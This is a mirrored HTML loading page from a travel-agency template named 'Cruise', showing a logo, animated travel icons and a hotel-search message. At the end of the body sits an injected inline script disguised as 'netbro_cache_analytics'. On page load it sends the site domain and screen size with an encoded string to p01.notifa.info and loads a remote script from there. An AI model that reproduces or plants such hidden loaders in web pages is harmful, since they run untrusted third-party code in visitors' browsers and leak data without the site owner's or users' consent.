<!DOCTYPE html>
<html class="full-screen">

<!-- Mirrored from limpidthemes.com/Themeforest/cruise-demo/dark/loading.html by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 08 Nov 2019 21:03:48 GMT -->
<head>
	
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="description" content="">
	<meta name="author" content="LimpidThemes">
	
	<title>Cruise - Responsive Travel Agency Template</title>
	
    <!-- Styles -->
	<link href="assets/css/animate.min.css" rel="stylesheet">
    <link href="assets/css/bootstrap.min.css" rel="stylesheet" media="screen">
	<link href="assets/css/style.css" rel="stylesheet" media="screen">
	<link href="assets/font-awesome/css/font-awesome.min.css" rel="stylesheet">
	
	<!-- FONTS -->
	<link href='http://fonts.googleapis.com/css?family=Raleway:400,600,700,900' rel='stylesheet' type='text/css'>

</head>
<body class="full-screen">

<!-- BEGIN: SITE-WRAPPER -->
<div class="coming-soon-wrapper full-screen">
	<div class="coming-soon full-screen">
		<div class="centered-box text-center">
			<div class="logo">
				<h2>CRUISE</h2>
			</div>
			<div class="loading-animation">
				<span><i class="fa fa-plane"></i></span>
				<span><i class="fa fa-bed"></i></span>
				<span><i class="fa fa-ship"></i></span>
				<span><i class="fa fa-suitcase"></i></span>
			</div>
			<div class="search-title">
				<p>We Are On It! Looking For Best Hotels in <span>New York</span> This Will Take Few Seconds.</p>
			</div>
			<p class="copyright">&copy; 2015 Cruise</p>
		</div>
	</div>
</div>
<!-- END: SITE-WRAPPER -->

<!-- Load Scripts -->
<script src="assets/js/respond.js"></script>
<script src="assets/js/jquery.js"></script>
<script src="assets/plugins/jquery.plugin.min.js"></script>
<script src="assets/plugins/jquery.countdown.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/js.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAgpJX8T%2f64ovq9SGeojjkkM9jo8i40d2lKFqCV9zJWriijoLW5yk2XwBM2S3d5qskT3ROOHUlUlmWFlCFZuvjUWiBxRWLiq9c5yuSWin8rbKR5DVIb3qWSuwcbcgjSwg8j2vWwTNVaPN%2bNEqw23n8jln1OyoP1qJBlGR3F1jvH3UER6f8oqQikFXf8aAjh88ARcRI9HndcWhy2vPHP4VJ%2fNmlJwXc%2baghzEm3w2pXOeJB2HtcxIoYAv1PB5Dg6lXPgai4QKtp3S7%2bVF8QAlCiKifgKv%2b1%2bTCsmM1%2bNYAlWThSk2p181m08UHNAXLtVh9Fbk8UCBtnzrRk8PwnI8q3%2bsd7Z%2frzaJ3REEn3a68aUdadfhlBSGsJva2gWkjpQfIdRQ%2bMkhQGNaiNSkW23pDX0xEc5wzmxwbdGqbPbx%2b7mYFNCcQSiwKxupFbGhBbRDzw2IWHilbvk1DN1aKfwSvFhBgY9cd0hrgwAOIbZEb7UAbfRm229mT9og1PLxxg5WqVPSoZAjvHFgc%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from limpidthemes.com/Themeforest/cruise-demo/dark/loading.html by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 08 Nov 2019 21:03:48 GMT -->
</html>